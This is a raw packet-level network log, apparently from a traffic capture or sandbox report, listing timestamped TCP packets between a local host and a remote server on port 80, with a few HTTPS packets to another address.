Nov 5, 2024 18:46:08.615329981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615329981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615336895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615339994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615367889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615483046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615494967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615504980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615514994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615525007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615530014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615535021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615545988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615552902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615555048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615572929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615586042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615607977 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615618944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615629911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615639925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615650892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615660906 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615663052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615673065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615683079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615688086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615694046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615698099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615721941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615732908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615753889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615783930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615793943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615803003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615823984 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615833044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.615900040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615910053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615915060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615921021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.615942955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.616056919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616067886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616077900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616086960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616096020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616102934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.616106987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616117001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616130114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.616143942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.616158962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.616183043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.713622093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713634968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713644028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713824034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.713824034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.713829994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713848114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713859081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713896036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.713921070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.713937044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713948011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713958979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713974953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713984013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.713998079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714020014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714195967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714205027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714220047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714231014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714240074 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714258909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714282990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714395046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714412928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714422941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714458942 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714520931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714530945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714541912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714566946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714581966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714589119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714591980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714629889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714693069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714704037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714713097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714723110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714732885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714735985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714741945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714752913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714755058 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714773893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714782000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714792967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714823008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714831114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714839935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714848995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714865923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714865923 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714890003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714941025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714951038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714962006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714972019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714981079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.714988947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.714993000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715002060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715004921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715013027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715025902 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715025902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715043068 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715059996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715104103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715112925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715121984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715138912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715146065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715161085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715179920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715224981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715234041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715248108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715259075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715265036 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715269089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715280056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715295076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715308905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715327024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715336084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715342999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715356112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715365887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715367079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715377092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715387106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715396881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715396881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715406895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715424061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715451956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715517998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715528011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715538025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715548992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715559959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715567112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715569019 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715584993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715601921 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715621948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715681076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715724945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715749025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715759993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715781927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715791941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715791941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715812922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715842962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715864897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715874910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715883970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715893030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715908051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.715909958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715922117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715955019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.715980053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.716003895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.716013908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.716022968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.716036081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.716058016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.716061115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.716072083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.716114998 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.723491907 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.724061966 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.724081039 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.724539042 CET	49811	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:08.724543095 CET	443	49811	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:08.734889030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.734899044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.734909058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.734963894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.734983921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.734987020 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735044003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735054016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735079050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735100031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735153913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735171080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735181093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735191107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735197067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735207081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735207081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735228062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735243082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735269070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735281944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735290051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735301971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735308886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735327005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735352993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735363007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735373974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735383987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735394955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735403061 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735424042 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735446930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735462904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735471964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735481977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735516071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735637903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735677004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735682964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735692978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735728025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735758066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735768080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735778093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735788107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735794067 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735797882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735819101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735838890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735850096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735860109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735879898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735888004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.735889912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.735918999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736001968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736011028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736021996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736032009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736042023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736042976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736058950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736082077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736088037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736092091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736103058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736109972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736129999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736130953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736140013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736150026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736165047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736186981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736330032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736340046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736350060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736367941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736377001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736378908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736387014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736393929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736411095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736418009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736433983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736440897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736443043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736465931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736483097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736506939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736515999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736525059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736550093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736569881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736578941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736587048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736608028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736618042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736629009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736659050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736666918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736675978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736685038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736687899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736709118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736722946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736795902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736805916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736815929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736824989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736835957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736874104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736900091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736911058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736921072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736929893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736937046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736939907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.736957073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.736972094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737032890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737044096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737054110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737076044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737113953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737139940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737149000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737159014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737166882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737173080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737183094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737193108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737193108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737216949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737237930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737238884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737247944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737256050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737267971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737282991 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737380981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737390995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737401962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737411976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737459898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:08.737467051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:08.737478018 CET	80	49804	31.41.244.11	192.168.2.4
